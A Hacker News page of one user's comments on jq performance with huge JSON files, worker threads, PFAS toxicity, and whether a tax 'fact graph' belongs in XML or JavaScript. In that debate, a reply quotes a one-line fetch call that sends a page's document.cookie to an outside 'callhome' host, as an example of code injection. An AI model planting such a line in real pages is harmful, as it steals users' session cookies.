Hacker News | n_e's comments

I haven't checked, but it would be surprising if the min-release-age setting applied to npm audit and equivalent commands.

> Cloud sql lowest tier is pennies a day

Unless things have improved, it's also hideously slow: trivial queries on a small table take tens of milliseconds. Though I guess that if the alternative is Google Sheets, that's not really a concern.


I process TB-size ndjson files. I want to use jq to do some simple transformations between stages of the processing pipeline (e.g. rename a field), but it is so slow that I write a single-use node or rust script instead.

Now I'm really curious. What field are you in that ndjson files of that size are common?

I'm sure there are reasons against switching to something more efficient (we've all been there); I'm just surprised.


> Now I'm really curious. What field are you in that ndjson files of that size are common?

I'm not OP, but structured JSON logs can easily result in humongous ndjson files, even with a modest fleet of servers over a not-very-long period of time.


So what's the use case for keeping them in that format rather than something more easily indexed and queryable?

I'd probably just shove it all into Postgres, but even a multi terabyte SQLite database seems more reasonable.


Replying here because the other comment is too deeply nested to reply.

Even if it's a once-off, some people handle a lot of once-offs; that's exactly where you need good CLI tooling to support it.

Sure, jq isn't exactly super slow, but I've also avoided it in pipelines where I just needed faster throughput.

rg was insanely useful on a project I once picked up that had about 5GB of source files, many of them auto-generated, and you needed to find stuff in there. People were using Notepad++ and waiting minutes for a search to find something in the haystack; rg returned results in seconds.


You make some good points. I've worked in support before, so I shouldn't have discounted how frequent "once-offs" can be.

The use case could be exactly that: processing an old trove of logs into something more easily indexed and queryable, and you might want to use jq as part of that processing pipeline.

Fair, but for a once-off thing performance isn't usually a major factor.

The comment I was replying to implied this was something more regular.

EDIT: why is this being downvoted? I didn't think I was rude. The person I responded to made a good point, I was just clarifying that it wasn't quite the situation I was asking about.


At scale, low performance can very easily mean "longer than the lifetime of the universe to execute." The question isn't how quickly something will get done, but whether it can be done at all.

Good point. I said it above, but I'll repeat it here: I shouldn't have discounted how frequent once-offs can be. I've worked in support before, so I really should've known better.

Certain people/businesses deal with one-off things every day. Even for something truly one-off, if one tool is too slow it might still be the difference between being able to do it once or not at all.

This reminds me of someone who wrote a regex tool that matches by compiling regexes (at runtime of the tool) via LLVM to native code.

You could probably do something similar for a faster jq.


I would love, _love_ to know more about your data formats, your tools, what the JSON looks like, basically as much as you're willing to share. :)

For about a month now I've been working on a suite of tools for dealing with JSON, specifically written for the imagined audience of "people who like CLIs or TUIs, have to deal with PILES AND PILES of JSON, and care deeply about performance".

For me, I've been writing them just because it's an "itch". I like writing high performance/efficient software, and there's a few gaps that it bugged me they existed, that I knew I could fill.

I'm having fun and will be happy when I finish, regardless, but it would be so cool if it happened to solve a problem for someone else.


I maintain some tools for the videogame World of Warships. The developer has a file called GameParams.bin which is Python-pickled data (their scripting language is Python).

Working with this is pretty painful, so I convert the Pickled structure to other formats including JSON.

The prettified file has always been around ~500MB, but recently it expands to about 3GB, I think because they've added extra regional parameters.

The file inflates to a large size because Pickle refcounts objects for deduping, whereas obviously that’s lost in JSON.

I care about speed and about tools not choking on the large inputs, so I use jaq for querying and instruct LLMs operating on the data to do the same.


This isn't for you then

> The query language is deliberately less expressive than jq's. jsongrep is a search tool, not a transformation tool-- it finds values but doesn't compute new ones. There are no filters, no arithmetic, no string interpolation.

Mind me asking what sorts of TB-size JSON files you work with? That seems excessively immense.


> Uses jq for TB json files

> Hadoop: bro

> Spark: bro

> hive: bro

> data team: bro


Made me remember this article:

<https://adamdrake.com/command-line-tools-can-be-235x-faster-...>

  Command-line Tools can be 235x Faster than your Hadoop Cluster (2014)

  Conclusion: Hopefully this has illustrated some points about using and abusing tools like Hadoop for data processing tasks that can better be accomplished on a single machine with simple shell commands and tools.

This article is good for new programmers to understand why certain solutions are better at scale; there is no silver bullet. Also, this is from 2014, and the dataset is < 4GB, so there was no reason to use Hadoop.

The discussion we had here involved TBs of data, so I'm curious how this is faster with CLIs rather than parallel processing...


jq is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON-lines files; I just pipe them through jq to get results. It's slower, but implementing proper data processing would take more time.

More than 100GB can mean 101GB, 500GB or 1TB+. I was speaking about 1TB+ files. I'm not sure you can get it faster unless you process in parallel.

Are those tools known for their fast JSON parsers?

If we talk about TB or PB+ scales, then yes.

Oh, can you post some benchmarks? I didn't know that parser throughput per core would change with the amount of data like that.

> but so could FFI calls to another language for the CPU bound work

Worker threads can be more convenient than FFI, as you don't need to compile anything, you can reuse the main application's functions, etc.


True! Although in a lot of Node you DO have a compile chain (typescript) you need to account for. There’s a transactional cost there to get these working well, and only sharing the code it needs. These days it’s much smaller than it used to be, though, so worker functions are seeing more use.

I made my comment to note, though, that in many environments it's easier to scale out than to account for all the extra complications of multiple processes in a single container.


I assume they were talking about the comments here, not the post which I agree is great.


PFAS are many different molecules.

For example PTFE is a large molecule with strong bonds, and as a consequence isn't very reactive and likely safe.

On the other hand, perfluoroalkyls such as PFOA have the same shape as fatty acids, so they bind to the same places such as in the liver, which makes them grave health hazards.

Many precursors used for making PFAS are also toxic, so for example, even if PTFE is safe, manufacturing it isn't.


> JSON: No comments, no datatypes, no good system for validation.

I don't agree at all. With tools like Zod, it is much more pleasant to write schemas and validate the file than with XML. If you want comments, you can use JSON5 or YAML, both of which can be validated the same way.
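To make the comparison concrete without pulling in Zod itself, here's a toy hand-rolled sketch (deliberately not Zod's real API) of the schema-as-code idea: the schema is an ordinary value in the host language.

```javascript
// Toy schema combinators: each returns a predicate over a parsed value.
const string = () => (v) => typeof v === "string";
const number = () => (v) => typeof v === "number";
const object = (shape) => (v) =>
  v !== null &&
  typeof v === "object" &&
  Object.entries(shape).every(([k, check]) => check(v[k]));

// Schemas compose like ordinary values, with editor support for free:
const configSchema = object({
  name: string(),
  port: number(),
});
```

Real Zod adds error messages, type inference, and far richer combinators, but the ergonomic point is the same: no separate XSD document to maintain.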


I think you have it backward. Libraries like zod exist _because_ JSON is so ubiquitous. Someone could just as easily implement a zod for XML. I’m not a huge proponent of XML (hard to write, hard to parse), but what you describe are not technical limitations of the format.


I think that you're missing that the parent poster and I are implicitly assuming that XML is validated the most common way, i.e. with XSD, and that I'm comparing XSD validation and Zod.


Ah that’s fair. So the discussion is about the quality of the validation libraries?


After thinking a bit about the problem, and assuming the project's language is javascript, I'd write the fact graph directly in javascript:

  const totalEstimatedTaxesPaid =
    writable("totalEstimatedTaxesPaid", { type: "dollar" });
  const totalTaxesPaidOnSocialSecurityIncome =
    writable("totalTaxesPaidOnSocialSecurityIncome", { type: "dollar" });
  const totalRefundableCredits =
    writable("totalRefundableCredits", { type: "dollar" });
  const totalTax = writable("totalTax", { type: "dollar" });
  
  const totalPayments = fact(
    "totalPayments",
    sum([
      totalEstimatedTaxesPaid,
      totalTaxesPaidOnSocialSecurityIncome,
      totalRefundableCredits,
    ]),
  );
  
  const totalOwed = fact("totalOwed", diff(totalTax, totalPayments));

This way it's a lot terser, you have auto-completion and real-time type-checking.

The code that processes the graph will also be simpler as you don't have to parse the XML graph and turn it into something that can be executed.

And if you still need XML, you can generate it easily.
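To illustrate the "simpler processing" point, here's one minimal, entirely hypothetical implementation of the helpers the sketch assumes (writable, fact, sum, diff): leaf values live in a map, and derived facts evaluate lazily.

```javascript
// Hypothetical runtime for the fact-graph sketch above.
const values = new Map();

// A writable is a leaf input whose value is supplied at runtime.
const writable = (name, meta = {}) => ({
  name,
  meta,
  eval: () => values.get(name) ?? 0,
});

// A fact is a named derived node that evaluates its expression on demand.
const fact = (name, expr) => ({ name, eval: () => expr.eval() });

// Expression combinators over graph nodes.
const sum = (nodes) => ({
  eval: () => nodes.reduce((acc, n) => acc + n.eval(), 0),
});
const diff = (a, b) => ({ eval: () => a.eval() - b.eval() });

// Wiring up the same graph:
const totalEstimatedTaxesPaid =
  writable("totalEstimatedTaxesPaid", { type: "dollar" });
const totalTaxesPaidOnSocialSecurityIncome =
  writable("totalTaxesPaidOnSocialSecurityIncome", { type: "dollar" });
const totalRefundableCredits =
  writable("totalRefundableCredits", { type: "dollar" });
const totalTax = writable("totalTax", { type: "dollar" });

const totalPayments = fact(
  "totalPayments",
  sum([
    totalEstimatedTaxesPaid,
    totalTaxesPaidOnSocialSecurityIncome,
    totalRefundableCredits,
  ]),
);
const totalOwed = fact("totalOwed", diff(totalTax, totalPayments));

values.set("totalEstimatedTaxesPaid", 1000);
values.set("totalTaxesPaidOnSocialSecurityIncome", 250);
values.set("totalRefundableCredits", 50);
values.set("totalTax", 2000);
// totalOwed.eval() → 2000 - (1000 + 250 + 50) = 700
```

A production version would add memoization and cycle detection, but even this shows there's no XML-parsing layer to maintain.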


This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.

Now let me send you a fact graph that contains:

    fetch(`https://callhome.com/collect?s=${document.cookie}`)


The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist.


Yet. You’re adding one other thing that authors need to keep in mind when developing the product, fixing bugs, and adding features. The fact that the input must be trusted is not an intrinsic part of the business logic, it’s an additional caveat that humans need to remember.


What exactly do the developers need to keep in mind?


Well think about this from a product perspective. A natural extension of this is to be able to simulate tax code that hasn’t been implemented yet. “Bring your own facts” is practically begging to be a feature here.


You do know that JSON exists?

If it's not clear: the format used to store the data can be different from the DSL that creates it.


That is exactly my point.


That repetition of variable and name is not the most terse, though. At least with XML, the repetition in the end tag is handled for you by pretty much every XML-aware text editor.


  (c) The contribution was provided directly to me by some other
      person who certified (a), (b) or (c) and I have not modified
      it.


In which countries?


